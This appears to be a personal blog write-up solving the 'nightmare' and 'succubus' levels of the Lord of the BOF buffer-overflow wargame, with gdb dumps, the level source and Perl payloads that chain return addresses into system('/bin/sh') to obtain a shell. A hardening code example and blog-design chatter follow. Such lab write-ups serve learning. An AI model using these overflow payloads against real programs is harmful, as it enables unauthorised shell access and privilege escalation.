0xbffffb1c:     0x00000000      0xbffffc57      0xbffffc6a      0xbffffc78

0xbffffb2c:     0xbffffc90      0xbffffcaf      0xbffffcd1      0xbffffcdf

0xbffffb3c:     0xbffffea2      0xbffffec1      0xbffffedf      0xbffffef4

(gdb) x/40wx 0xbffffaa8

0xbffffaa8:     0xbffffc7c      0x90909090      0x90909090      0x90909090

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x4000ae60      0x90909090      0x90909090      0x90909090

0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae8:     0x90909090      0x0800ae60      0x080486b4      0x00000002

0xbffffaf8:     0xbffffb14      0x08048350      0x0804877c      0x4000ae60

0xbffffb08:     0xbffffb0c      0x40013e90      0x00000002      0xbffffc0e

0xbffffb18:     0xbffffc1a      0x00000000      0xbffffc57      0xbffffc6a

0xbffffb28:     0xbffffc78      0xbffffc90      0xbffffcaf      0xbffffcd1

0xbffffb38:     0xbffffcdf      0xbffffea2      0xbffffec1      0xbffffedf

(gdb) x/40wx 0xbffffaa0

0xbffffaa0:     0x40058ae0      0x42424242      0xbffffc7c      0x90909090

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x4000ae60      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x90909090      0x90909090      0x90909090      0x0800ae60

0xbffffaf0:     0x080486b4      0x00000002      0xbffffb14      0x08048350

0xbffffb00:     0x0804877c      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc0e      0xbffffc1a      0x00000000

0xbffffb20:     0xbffffc57      0xbffffc6a      0xbffffc78      0xbffffc90

0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿ ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()/* Something isn't working right. But I just had a feeling it was because the argument passed to system was wrong.... */

(gdb) q


[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb) x/s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1" /* foo.c, what on earth kind of address did you give me.. */

(gdb) x/5s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

0xbffffcdf:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...


(gdb) x/5s 0xbffffc70

0xbffffc70:      "/bin/sh"

0xbffffc78:      "REMOTEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ exit

exit

Segmentation fault (core dumped)

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ my-pass

euid = 518


Good, good




I don't know why, but this time, maybe because it's been a while since I solved a new level, it was really fun lololol

Why does getting function addresses feel so good lolololol


login: zombie_assassin

Password:

Last login: Fri May  2 14:40:51 from 192.168.10.1

ls

[zombie_assassin@localhost zombie_assassin]$ ls

foo  foo.c  ssssssss  succubus  succubus.c

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*
        The Lord of the BOF : The Fellowship of the BOF
        - succubus
        - calling functions continuously
*/

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>

// the inspector
int check = 0;

void MO(char *cmd)
{
        if(check != 4)
                exit(0);

        printf("welcome to the MO!\n");

        // olleh!
        system(cmd);
}

void YUT(void)
{
        if(check != 3)
                exit(0);

        printf("welcome to the YUT!\n");
        check = 4;
}

void GUL(void)
{
        if(check != 2)
                exit(0);

        printf("welcome to the GUL!\n");
        check = 3;
}

void GYE(void)
{
        if(check != 1)
                exit(0);

        printf("welcome to the GYE!\n");
        check = 2;
}

void DO(void)
{
        printf("welcome to the DO!\n");
        check = 1;
}

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // you cannot use library
        if(strchr(argv[1], '\x40')){
                printf("You cannot use library\n");
                exit(0);
        }

        // check address
        addr = (char *)&DO;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with DO\n");
                exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer
        // 100 : extra space for copied argv[1]
        memset(buffer, 0, 44);
        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}

/* To sum up the code: it wipes everything except buffer+148. And the attacker has to call the functions in the order DO->GYE->GUL->YUT->MO, so that MO finally calls the system function with the argument it was handed. Library functions can't be used. And I initially forgot that 44 bytes have to be filled; it's 44 bytes + code~~~ lol */


[zombie_assassin@localhost zombie_assassin]$ gdb -q ssssssss

(gdb) b main

Breakpoint 1 at 0x804880e

(gdb) r

Starting program: /home/zombie_assassin/ssssssss


Breakpoint 1, 0x804880e in main ()

(gdb) p DO

$1 = {<text variable, no debug info>} 0x80487ec <DO>

(gdb) p GYE

$2 = {<text variable, no debug info>} 0x80487bc <GYE>

(gdb) p GUL

$3 = {<text variable, no debug info>} 0x804878c <GUL>

(gdb) p YUT

$4 = {<text variable, no debug info>} 0x804875c <YUT>

(gdb) p MO

$5 = {<text variable, no debug info>} 0x8048724 <MO>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "BBBB", "CCCC"'`

¼Œ\$AAAABBBBCCCC

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

Segmentation fault (core dumped)

/* Honestly, I lost it here. With so many addresses, ugh.. */

[zombie_assassin@localhost zombie_assassin]$ gdb -q -c core

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp

0xbffffaa4:     0x42424242      0x43434343      0x08048400      0x08048808

0xbffffab4:     0x00000002      0xbffffad4      0x0804839c      0x0804894c

0xbffffac4:     0x4000ae60      0xbffffacc      0x40013e90      0x00000002

0xbffffad4:     0xbffffbd0      0xbffffbdb      0x00000000      0xbffffc28

0xbffffae4:     0xbffffc42      0xbffffc50      0xbffffc68      0xbffffc87

0xbffffaf4:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb04:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb14:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb24:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb34:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/wx 0xbffffaa8

0xbffffaa8:     0x43434343

(gdb) q

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼Œ\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ exit

exit

Segmentation fault (core dumped)

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼Œ\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ my-pass

euid = 517


While there are really many addresses you can't use, 100 bytes are left over, so I just put "/bin/sh" into argv[1] and had the argument taken from there. The preceding functions take no arguments (void), so they just take the return address and run one after another, but since MO takes an argument, you put the argument's address at MO's address + 4 bytes, and for the argument itself you compute the address after that and put it there.

Not much left, fighting!
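Both nightmare.c and succubus.c above copy argv[1] into char buffer[40] with an unchecked strcpy, which is the whole reason a 44-byte-plus argument can overwrite the saved return address. As an added example of my own (not part of the Lord of the BOF sources), here is the bounded copy that closes that hole: copy_bounded refuses any input that does not fit together with its terminating NUL, without ever reading past the destination size, and hardened_main shows the main() of either program using it. The names copy_bounded, hardened_main and try_copy_of_length are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 40   /* same size as buffer[40] in nightmare.c and succubus.c */

/* Bounded replacement for the unchecked strcpy(buffer, argv[1]).
   Copies src into dst only if it fits together with its terminating NUL.
   Returns 0 on success; on an over-long input returns -1, leaves dst as an
   empty string and writes nothing past dst[dstsz-1]. It never reads more than
   dstsz bytes of src, so an unterminated source cannot be scanned past the limit. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
        size_t n = 0;
        if (dstsz == 0)
                return -1;
        while (n < dstsz && src[n] != '\0')
                n++;
        if (n == dstsz) {          /* no room for the NUL: refuse rather than truncate silently */
                dst[0] = '\0';
                return -1;
        }
        memcpy(dst, src, n + 1);   /* n data bytes plus the NUL */
        return 0;
}

/* main() of nightmare/succubus with the copy length-checked.
   Return codes: 0 ok, 1 missing argument, 2 argument too long. */
int hardened_main(int argc, char *argv[])
{
        char buffer[BUFSZ];

        if (argc < 2) {
                fprintf(stderr, "argv error\n");
                return 1;
        }
        if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
                fprintf(stderr, "argument too long (max %d bytes)\n", BUFSZ - 1);
                return 2;
        }
        printf("%s\n", buffer);
        return 0;
}

/* Exercises the limit: feeds a constructed string of len 'A' bytes through
   copy_bounded into a BUFSZ-byte buffer and returns copy_bounded's result
   (-2 only if the scratch allocation fails). */
int try_copy_of_length(size_t len)
{
        char buffer[BUFSZ];
        char *src = malloc(len + 1);
        int rc;
        if (!src)
                return -2;
        memset(src, 'A', len);
        src[len] = '\0';
        rc = copy_bounded(buffer, sizeof buffer, src);
        free(src);
        return rc;
}

int main(int argc, char *argv[])
{
        return hardened_main(argc, argv);
}
```

With this check in place the 44-byte padding plus addresses used in the levels above is rejected before anything is written to the stack. The Red Hat 6.2 toolchain these levels run on has no stack protector, so the explicit length check is the only guard; on a modern toolchain you would also build with -fstack-protector-strong and _FORTIFY_SOURCE, but neither replaces checking the length yourself.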


I changed the look a bit. Though all I actually changed was the size..

The carrot in the background isn't visible.. sigh.......

Carrot...

Oh well, I'll redraw it next time.. haha..


Also the header image wasn't linked, and I don't know how, but I fixed it. Now clicking the header image takes you back to home! But I failed at resizing it, so to shrink it I took a screenshot at a reduced width (quality be damned..) and re-uploaded that as the header image, and somehow it still isn't fixed? Anyway the header image isn't fixed and the quality keeps getting worse, so I'll have to remake that too..


Not fixed

I'll remake it next time

Only the quality got worse lol


+) I remade the header image, but even drawing it at the right size it's broken. Why is it like this, ugh, I must have touched something weird
